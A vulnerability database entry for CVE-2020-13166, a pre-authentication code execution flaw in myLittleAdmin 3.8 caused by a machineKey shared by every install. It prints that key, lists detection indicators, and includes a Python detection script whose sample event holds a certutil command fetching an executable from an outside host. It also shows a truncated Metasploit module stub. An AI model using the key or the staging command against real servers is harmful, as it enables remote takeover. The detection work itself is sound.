CVE-2020-13166
Published 2020-05-19
Priority: P1 (82) · Severity: critical · CVSS 3.1 base score: 9.8
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available (see Exploit-DB below)
EPSS: 77.64% (99.5th percentile)
The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mylittletools | mylittleadmin | — | — |
Detection & IOCs (extracted from sources)
Bytes (the hardcoded ViewState validationKey, 64 bytes):
\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf
- Detect exploitation attempts by monitoring HTTP POST requests to myLittleAdmin (default port 8401/TCP) that carry a `__VIEWSTATE` parameter; a crafted ViewState signed with the hardcoded machineKey triggers a 302 redirect to /error/index.html on successful exploitation.
- Alert on HTTP responses containing 'myLittleAdmin for SQL Server' on port 8401 to identify exposed, potentially vulnerable instances.
- Monitor for processes spawned as IUSRPLESK_sqladmin (the "SQL Admin MSSQL anonymous account" under Plesk) as an indicator of post-exploitation activity.
- The exploit uses the CmdStager flavors psh_invokewebrequest, certutil, and vbs for payload staging; monitor for certutil.exe or PowerShell Invoke-WebRequest activity originating from the myLittleAdmin process.
- The hardcoded `__VIEWSTATEGENERATOR` value CA0B0334 in HTTP requests to myLittleAdmin is a strong indicator of exploitation using the known hardcoded machineKey.
- The hardcoded machineKey (validationKey) is the same across all myLittleAdmin 3.8 installations, so any instance is exploitable without prior authentication or customer-specific knowledge.
- Plesk installs myLittleAdmin automatically as an optional component during a 'full' installation, which extends the attack surface to every Plesk Obsidian full install shipping myLittleAdmin 3.8.
- SSL is enabled by default in the Metasploit module; defenders should ensure TLS inspection is in place on port 8401 to detect malicious ViewState payloads in transit.
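The following is an added example, not code from the CVE page, the advisory or the Metasploit module: it turns the root cause above (one validationKey shared by every install) and the indicators in the list into three checks, a web.config audit for the shared key, a classifier for one proxied HTTP exchange, and a filter for stager processes run as the Plesk myLittleAdmin account. The web.config excerpts, the HTTP exchange and the process event are constructed samples; the proxy capture format, the target path /default.aspx and the Sysmon-style event field names are assumptions.

```python
"""Added detection example for CVE-2020-13166 (not code from the CVE page or
the Metasploit module): audit a web.config for the shared validationKey, tag
HTTP exchanges with the page's indicators, and flag stager processes run as
the Plesk myLittleAdmin account. Sample inputs are constructed; the proxy
capture format and the process-event field names are assumptions."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# 64-byte validationKey shared by every myLittleAdmin 3.8 install (bytes from the page).
HARDCODED_VALIDATION_KEY = bytes.fromhex(
    "5c7eef6650639d2cb8faa0da36af24452dcf"
    "69065f2edc2c8f2f44c0220be2e5889ca01a"
    "207fc5fce62d1a5a4f6d2410722261e6a33e"
    "77e0628b17aa928039bf"
)
HARDCODED_VIEWSTATE_GENERATOR = "CA0B0334"
MYLITTLEADMIN_PORT = 8401                     # default myLittleAdmin port
PLESK_MLA_USER = "IUSRPLESK_sqladmin"         # account myLittleAdmin runs as under Plesk
# CmdStager flavors used by the exploit: certutil, PowerShell Invoke-WebRequest, vbs
# (cscript/wscript are assumed here as the hosts for the vbs flavor).
STAGER_IMAGES = {"certutil.exe", "powershell.exe", "cscript.exe", "wscript.exe"}


def web_config_uses_hardcoded_key(web_config_xml: str) -> bool:
    """True if any <machineKey> carries the known validationKey (hex, case-insensitive)."""
    root = ET.fromstring(web_config_xml)
    return any(mk.get("validationKey", "").lower() == HARDCODED_VALIDATION_KEY.hex()
               for mk in root.iter("machineKey"))


def classify_request(raw_request: str, status: int, location: str = "") -> list:
    """Indicators for one HTTP exchange: a __VIEWSTATE POST, the myLittleAdmin port,
    the hardcoded __VIEWSTATEGENERATOR, and the 302 to /error/index.html that
    follows a successful deserialization."""
    head, _, body = raw_request.partition("\r\n\r\n")
    method = head.split(" ", 1)[0]
    host = re.search(r"^Host:\s*(\S+)", head, re.M | re.I)
    hostname = host.group(1) if host else ""
    port = int(hostname.rsplit(":", 1)[1]) if ":" in hostname else 80
    params = parse_qs(body)
    findings = []
    if method == "POST" and "__VIEWSTATE" in params:
        findings.append("viewstate_post")
        if port == MYLITTLEADMIN_PORT:
            findings.append("mylittleadmin_port")
        if params.get("__VIEWSTATEGENERATOR", [""])[0].upper() == HARDCODED_VIEWSTATE_GENERATOR:
            findings.append("hardcoded_generator")
        if status == 302 and location.endswith("/error/index.html"):
            findings.append("exploit_success_redirect")
    return findings


def flag_process_event(event: dict) -> bool:
    """True for a stager image launched as IUSRPLESK_sqladmin; PowerShell only
    counts when the command line invokes Invoke-WebRequest (or its iwr alias)."""
    user = event.get("User", "").rsplit("\\", 1)[-1]
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if user != PLESK_MLA_USER or image not in STAGER_IMAGES:
        return False
    if image == "powershell.exe":
        return re.search(r"invoke-webrequest|\biwr\b", event.get("CommandLine", ""), re.I) is not None
    return True


# --- constructed samples (not real captures) ---
VULNERABLE_WEB_CONFIG = f"""<configuration><system.web>
  <machineKey validationKey="{HARDCODED_VALIDATION_KEY.hex().upper()}" validation="SHA1" />
</system.web></configuration>"""
HARDENED_WEB_CONFIG = """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" validation="SHA1" />
</system.web></configuration>"""
EXPLOIT_REQUEST = (                       # /default.aspx is an assumed target path;
    "POST /default.aspx HTTP/1.1\r\n"     # the ViewState value is a placeholder, not a payload
    "Host: 198.51.100.10:8401\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "__VIEWSTATE=%2FwEPDwUBMGRk&__VIEWSTATEGENERATOR=CA0B0334"
)
BENIGN_REQUEST = "GET /login.aspx HTTP/1.1\r\nHost: 198.51.100.10:8401\r\n\r\n"
STAGER_EVENT = {                          # Sysmon-style field names assumed
    "Image": "C:\\Windows\\System32\\certutil.exe",
    "User": "PLESKHOST\\IUSRPLESK_sqladmin",
    "CommandLine": "certutil -urlcache -f http://203.0.113.7/s.exe s.exe",
}

if __name__ == "__main__":
    print("web.config uses shared key:", web_config_uses_hardcoded_key(VULNERABLE_WEB_CONFIG))
    print("hardened web.config:", web_config_uses_hardcoded_key(HARDENED_WEB_CONFIG))
    print("exploit exchange:", classify_request(EXPLOIT_REQUEST, 302, "/error/index.html"))
    print("benign exchange:", classify_request(BENIGN_REQUEST, 200))
    print("stager process:", flag_process_event(STAGER_EVENT))
```

The web.config check is the one that settles whether an instance is still exposed: rotating the key (or switching to `AutoGenerate,IsolateApps`, as in the hardened sample) invalidates any ViewState an attacker signs with the public bytes, whereas the traffic and process indicators only tell you that someone tried.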
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
exploitdb · 2020-05-25
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit modules derive from Msf::Exploit::Remote; the superclass
# was dropped in extraction and is restored here.
class MetasploitModule < Msf::Exploit::Remote
  VIEWSTATE_GENERATOR = 'CA0B0334'.freeze

  # 64-byte validationKey hardcoded in myLittleAdmin 3.8's web.config and
  # shared by every installation
  VIEWSTATE_VALIDATION_KEY =
    "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
    "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
    "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
    "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::ViewState
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(
      # The module metadata, options, check and exploit methods are truncated
      # on the source page; see the Metasploit repository for the full module.
    )
  end
end
```
Metasploit: Plesk/myLittleAdmin ViewState .NET Deserialization
This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded parameters in the web.config file for ASP.NET. Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup. Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account." Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html
- https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/
Published: 2020-05-19